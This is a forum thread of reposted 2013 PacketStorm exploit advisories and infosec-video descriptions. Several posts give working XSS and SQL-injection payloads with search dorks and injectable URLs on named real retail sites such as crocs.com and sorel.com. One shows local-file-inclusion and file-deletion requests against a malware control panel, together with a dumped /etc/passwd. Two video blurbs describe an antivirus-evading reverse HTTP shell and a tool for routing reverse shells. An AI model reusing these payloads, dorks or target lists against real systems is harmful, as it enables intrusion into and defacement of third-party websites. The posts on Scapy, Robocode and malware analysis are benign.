    Demandware Store software suffers from a cross site scripting vulnerability. # Exploit Title: Demandware Store XSS Vulnerability # Date: 2013-02-10 # Author: Cyb3rgh0st aka Rajat # Vendor or Software Link: http://www.demandware.com/ # Version: n/a # Category: webapps/php # Google Keywords: inurl:on/demandware.store/ or inurl:default/Search-Show?q= # Tested on: Windows 7 and Backtrack rc3 #POC: http://www.example.com/on/demandware.store/Sites-crocs_us-Site/default/Search-Show?q={/exploit/XSS} exploit="1%3b%3C%2fscript%3E%3Cscript%3Ealert%28/xss/%29;%3C/script%3E"(without quotes) # Demo site: 1.http://www.crocs.com/on/demandware.store/Sites-crocs_us-Site/default/Search-Show?q=1%3b%3C%2fscript%3E%3Cscript%3Ealert%28/xss/%29;%3C/script%3E 2.http://www.sorel.com/on/demandware.store/Sites-Sorel_US-Site/default/Search-Show?q=1%3b%3C%2fscript%3E%3Cscript%3Ealert%28/xss/%29;%3C/script%3E 3.http://www.cpopowermatic.com/on/demandware.store/Sites-powermatic-Site/default/Search-Show?q=1%3b<%2fscript><script>alert(/xss/);</script> 4.http://www.elc.co.uk/on/demandware.store/Sites-ELCENGB-Site/default/Search-Show?q=1%3b%3C%2fscript%3E%3Cscript%3Ealert%28/xss/%29;%3C/script%3E 5.http://www.jochen-schweizer.de/on/demandware.store/Sites-JSShop-Site/default/Search-Show?q=1%3b<%2fscript><script>alert(/xss/);</script> 6.http://www.callawaygolfpreowned.com/search/results,default,sc.html?q=1%3b%3C%2fscript%3E%3Cscript%3Ealert%28/xss/%29;%3C/script%3E #Greetz to Team Indishell !!! Source: PacketStorm
  12. Praetorian503
    Smoke Loader Command and Control panel suffers from local file inclusion and file deletion vulnerabilities. Two other vulnerabilities I forgot to mention, lfi and file deletion via control.php. The user must be logged into the administrative panel. 1. LFI GET http://evilserver.net/control.php?act=dwnshell&file=../../../../etc/passwd Enter username for Who are you? at evilsite.net:80:eviladmin Password: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin saslauth:x:499:499:"Saslauthd user":/var/empty/saslauth:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin maniaque:x:500:500::/home/maniaque:/bin/bash mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash 2. Arbitrary file deletion GET http://evilserver.net/control.php?act=delshell&file=../index.php Enter username for Who are you? at evilsite.net:80:eviladmin Password: wget evilserver.net/index.php HTTP request sent, awaiting response... 404 Not Found 2013-02-17 09:03:49 ERROR 404: Not Found. The panel's c&c gateway is index.php. In older versions it was easily identifiable as the only output it returned was "404 Error'' The newer versions mask the gateway with a standard 404 Not Found, but with a 200 status. Source: PacketStorm
  13. Praetorian503
    0101SHOP CMS suffers from multiple remote SQL injection vulnerabilities. Note that this finding houses site-specific data. .:: In The Name Of God ::. #################################################### # 0101SHOP CMS SQL Injection Vulnerability # # Security Risk : High # # Discovered By IRaNHaCK Security Team (MR.XpR # # Our WebSite : IRaNHaCK.ORG # # Tested On : XP , 7 , BackTrack # # Date : 2013-02-16 # # Version : All # # Category : WebApp # #################################################### ================================================================ 1- Dork : intext:"Powered by 0101HOST - Shopping Cart System." = = 2- Vulnerability(s) : = = Target.Com/productdetails.asp?pcode=[SQL] = Target.Com/listproduct.asp?categorycode=[SQL] = = 3- Example : = http://llsclifestyle.com/listproduct.asp?categorycode=101%27 = http://shop.pmcguild.hk/productdetails.asp?pcode=31043-150%27 = http://shop.honghaico.hk/listproduct.asp?categorycode=1%27 = http://shop.hkdongjian.com/listproduct.asp?categorycode=102%27 = = 4- Admin Page : = Target.Com/adminlogin.asp = ================================================================ ********************************************************************************************** We Are : Mr.XpR - UnknowN - FarbodEzRaeL - Bl4ck.Viper - Siamak.Black - MojiRider - V30Sharp * Mr.FixXxer - mr.remot3rs - nazila - HACKER OF FLOOD & All Members Of IRaNHaCK.ORG * ********************************************************************************************** ./By MojiRider ./Persian Gulf For Ever Source: PacketStorm
  14. Praetorian503
    Description: In this video I will show you how to get an http shell using a one python script. This script developed by Dave Kennedy and almost bypasses all AVs using this script. First you need to convert python script into an exe then use it in any windows system for the reverse http shell. About Script : - Contained source code and complied binaries of a server client reverse shell that communicates natively on HTTP channels. This shell also leverages a static AES encryption key for encrypted transport of the data. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Encrypted Http Shell
  15. Praetorian503
    Description: In this video I will show you how to use Scapy for traceroute - tcp & dns and also I will show you how to get a graph for traceroute using scapy. Scapy :- capy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more. It can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery (it can replace hping, 85% of nmap, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc.). It also performs very well at a lot of other specific tasks that most other tools can't handle, like sending invalid frames, injecting your own 802.11 frames, combining technics (VLAN hopping+ARP cache poisoning, VOIP decoding on WEP encrypted channel, ...), etc. See interactive tutorial and the quick demo: an interactive session (some examples may be outdated). Scapy Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Scapy Traceroute -- Tcp, Dns
  16. Praetorian503
    Description: I have a proposal to make — or rather, a proposition — to improve the overall state of security. Just as in the olden days, when swinging couples would put their house keys in a pile, and whoever drew a set of keys would go home with its owner, I suggest that security professionals do something similar (maybe with USB keyfobs or hardware tokens?). We don’t have enough empathy or understanding in this industry, and changing places with someone who does something very different from you (whether it be auditing, management, pentesting, engineering or something else) can help both personally and professionally. Think of it as job swapping — and if you’re married to your job, that’s kind of like spouse-swapping, isn’t it? Pick someone next to you and help them solve one of their security problems. You don’t even need to bring Crisco. Source : - ShmooCon Firetalks 2013 (Hacking Illustrated Series InfoSec Tutorial Videos) Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Shmoocon 2013 - Swinging Security Style: An Immodest Proposal
  17. Praetorian503
    Description: Source : - ShmooCon Firetalks 2013 (Hacking Illustrated Series InfoSec Tutorial Videos) Shellsquid was built out of necessity. Corporate egress controls often limit outbound connections to http (tcp/80) and https (tcp/443); often requiring the traffic to exit through a proxy. When attacking victims it is then a necessity to use reverse payloads that connect on one of these two ports and are proxy aware. The safest option being https. This is straight forward. Start your listener and go. But what if you’re attacking multiple targets and want to keep them separate? What if you’re working with a team who is all attacking different targets and they can’t share a listener? What are you to do? Shellsquid is meant to alleviate this issue by dynamically routing your reverse connections to a configured listener on a different port and/or machine. Teams of penetration testers can now share a single perimeter systems listening over https, while routing reverse connections to internal hosts. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Shmoocon 2013 - Shellsquid: Distributed Shells With Node
  18. Praetorian503
    Description: WHAT IS ROBOCODE? Robocode is a programming game where the goal is to develop a robot battle tank to battle against other tanks in Java or .NET. The robot battles are running in real-time and on-screen. The motto of Robocode is: Build the best, destroy the rest! Besides being a programming game, Robocode is used for learning how to program, primarily in the Java language, but other languages like C# and Scala are becoming popular as well. Schools and universities are using Robocode as part of teaching how to program, but also for studying artificial intelligence (AI). The concept of Robocode is easy to understand, and a fun way to learn how to program. Robocode comes with its own installer, built-in robot editor and Java compiler, and only pre-requires a Java Virtual Machine (JVM) to exist on the system where it must be installed. Hence, everything a robot developer needs to get started is provided with the main Robocode distribution file (robocode-xxx-setup.jar). Robocode also supports developing robots using external IDEs like e.g. Eclipse, IntelliJ IDEA, NetBeans, Visual Studio etc., which supports the developer much better than the robot editor in Robocode. The fact that Robocode runs on the Java platform makes it possible to run it on any operating system with Java pre-installed, meaning that it will be able to run on Windows, Linux, Mac OS, but also UNIX and variants of UNIX. Note that Java 5.0 or newer must be installed on the system before Robocode is able to run. See the System Requirements for more information. Be aware that many users of Robocode (aka Robocoders) find Robocode to be very fun, but also very addictive. Robocode comes free of charge and is being developed as a spare-time project where no money is involved. The developers of Robocode are developing on Robocode because they think it is fun, and because they improve themselves as developers this way. Robocode is an Open Source project, which means that all sources are open to everybody. In addition, Robocode is provided under the terms of EPL (Eclipse Public License). Source - http://robocode.sourceforge.net/docs/ReadMe.html Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Robocode Tutorial - Teach Your Child How To Code
  19. Praetorian503
    Description: In this episode of Tektip, we take a look at Helge's Switchblade. I apologize for the somewhat poor quality of the recording, I was attempting to make the video very fast so I didn't miss any of the Shmoocon talks. Anyways, Switchblade is a windows application that is a toolkit for troubleshooting, analyzing, and mitigating Windows issues. Think of it as a toolkit that contains many freeware and open source tools. We were lucky enough to get a pre-release copy of version .8 to show off for this video. While I too often need to do generic windows troubleshooting for friends and family, I always like to put a Malware Analysis spin on things when I can. So in this video I focus on how to utilize some of the tools in switchblade to do some basic malware analysis. For me, this is a great portable malware analysis toolkit. If you want to follow along, feel free to download the malware samples I used in the downloads section. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Tektip Ep22 - Helge's Switchblade For Malware Analysis
  20. Praetorian503
    Description: Welcome to Part 9 of the Aircrack-ng Megaprimer series! In this video, I will be discussing the tool, airdriver-ng, which is very useful for everything wireless driver related for your linux machine. For a lot of great information security videos, please visit us at SecurityTube: Welcome to SecurityTube.net As always, if you have any questions, comments or feedback, you can either leave them below, contact me via email, or follow me on twitter: bennett@securitytube.net Twitter: @pbtomlinson Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Aircrack-Ng Megaprimer Part 9: Airdriver-Ng
  21. Praetorian503
  22. Praetorian503
    Scripts Genie Top Sites script suffers from a remote SQL injection vulnerability. ################################################################################## __ _ _ ____ / /___ _____ (_)_____________ ______(_)__ _____ / __ \_________ _ __ / / __ `/ __ \/ / ___/ ___/ __ `/ ___/ / _ \/ ___// / / / ___/ __ `/ / /_/ / /_/ / / / / (__ |__ ) /_/ / / / / __(__ )/ /_/ / / / /_/ / \____/\__,_/_/ /_/_/____/____/\__,_/_/ /_/\___/____(_)____/_/ \__, / /____/ ################################################################################## Top Sites Script, SQL Injection Vulnerabilities Software Page: http://scriptsgenie.com/index.php?do=catalog&c=scripts&i=top_site_script Product Page: http://www.hotscripts.com/listing/top-sites-2-2-1/ Script Demo: http://scriptsgenie.com/demo/toplist.2.11/toplist/index.php Author(Pentester): 3spi0n On Social: Twitter.Com/eyyamgudeer Greetz: Grayhats Inc. and Janissaries Platform. ################################################################################## [~] MySQL Injection on Demo Site (/out.php?id=) >>> http://scriptsgenie.com/demo/toplist.2.11/toplist/out.php?id=20' (MySQLi Found) Source: PacketStorm
  23. Praetorian503
    The Shopping.com API V3 PHP script suffers from a cross site scripting vulnerability. ################################################################################## __ _ _ ____ / /___ _____ (_)_____________ ______(_)__ _____ / __ \_________ _ __ / / __ `/ __ \/ / ___/ ___/ __ `/ ___/ / _ \/ ___// / / / ___/ __ `/ / /_/ / /_/ / / / / (__ |__ ) /_/ / / / / __(__ )/ /_/ / / / /_/ / \____/\__,_/_/ /_/_/____/____/\__,_/_/ /_/\___/____(_)____/_/ \__, / /____/ ################################################################################## Shopping.com Api V3 php Script, XSS Vulnerabilities Software Page: http://en.clicsell.com/script-shopping-v3.html Product Page: http://www.hotscripts.com/listing/shopping-com-api-v3-php-script/ Script Demo: http://en.clicsell.com/ Author(Pentester): 3spi0n On Social: Twitter.Com/eyyamgudeer Greetz: Grayhats Inc. and Janissaries Platform. ################################################################################## [~] Xss on Demo Site (Searchbox) >>> http://i.imgur.com/dIjfayE.png (Xss Found) >>> If you try; you may open demo site and xss attack code to Searchbox. >>> <script>alert('XSS')</script> Source: PacketStorm
  24. Praetorian503
    Scripts Genie Domain Trader script suffers from a remote SQL injection vulnerability. ################################################################################## __ _ _ ____ / /___ _____ (_)_____________ ______(_)__ _____ / __ \_________ _ __ / / __ `/ __ \/ / ___/ ___/ __ `/ ___/ / _ \/ ___// / / / ___/ __ `/ / /_/ / /_/ / / / / (__ |__ ) /_/ / / / / __(__ )/ /_/ / / / /_/ / \____/\__,_/_/ /_/_/____/____/\__,_/_/ /_/\___/____(_)____/_/ \__, / /____/ ################################################################################## Domain Trader Script, MySQL Injection Vulnerabilities Software Page: http://scriptsgenie.com/index.php?do=catalog&c=scripts&i=domain_trader_script_w%252Fparking Script Demo: http://www.scriptsgenie.com/demo/trader/ Author(Pentester): 3spi0n On Social: Twitter.Com/eyyamgudeer Greetz: Grayhats Inc. and Janissaries Platform. ################################################################################## [~] MySQL Injection on Demo Site (/catalog.php?viewdomain=now&id=) >>> http://www.scriptsgenie.com/demo/trader/catalog.php?viewdomain=now&id=1' (MySQLi Found) Source: PacketStorm
  25. Praetorian503
    Scripts Genie Games Site script suffers from a remote SQL injection vulnerability. ################################################################################## __ _ _ ____ / /___ _____ (_)_____________ ______(_)__ _____ / __ \_________ _ __ / / __ `/ __ \/ / ___/ ___/ __ `/ ___/ / _ \/ ___// / / / ___/ __ `/ / /_/ / /_/ / / / / (__ |__ ) /_/ / / / / __(__ )/ /_/ / / / /_/ / \____/\__,_/_/ /_/_/____/____/\__,_/_/ /_/\___/____(_)____/_/ \__, / /____/ ################################################################################## Games Site Script, MySQL Injection Vulnerabilities Software Page: http://scriptsgenie.com/index.php?do=catalog&c=scripts&i=games_site_script Product Page: http://www.hotscripts.com/listing/150-flash-game-script-comes-with-150-games/ Script Demo: http://scriptsgenie.com/demo/GameScript150Games/ Author(Pentester): 3spi0n On Social: Twitter.Com/eyyamgudeer Greetz: Grayhats Inc. and Janissaries Platform. ################################################################################## [~] MySQL Injection on Demo Site (/index.php?act=play&id=) >>> http://scriptsgenie.com/demo/GameScript150Games/index.php?act=play&id=122' (MySQLi Found) Source: PacketStorm
×
×
  • Create New...